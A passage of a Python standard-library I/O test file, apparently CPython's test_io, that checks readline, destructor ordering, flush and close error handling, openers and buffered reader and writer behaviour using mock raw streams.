self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test consumes large resources; It takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(support.TESTFN))
check_path_succeeds(FakePath(support.TESTFN.encode('utf-8')))
with self.open(support.TESTFN, "w") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(support.TESTFN), 'rwxa')
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
def test_close_assert(self):
class R(self.IOBase):
def __setattr__(self, name, value):
pass
def flush(self):
raise OSError()
f = R()
# This would cause an assertion failure.
self.assertRaises(OSError, f.close)
# Silence destructor error
R.flush = lambda self: None
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.tp(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertRegex(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertRegex(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
# Silence destructor error
raw.close = lambda: None
b.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
# Silence destructor error
b.flush = lambda: None
raw.close = lambda: None
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self) :
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
# Silence destructor error
bufio.close = lambda: None
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
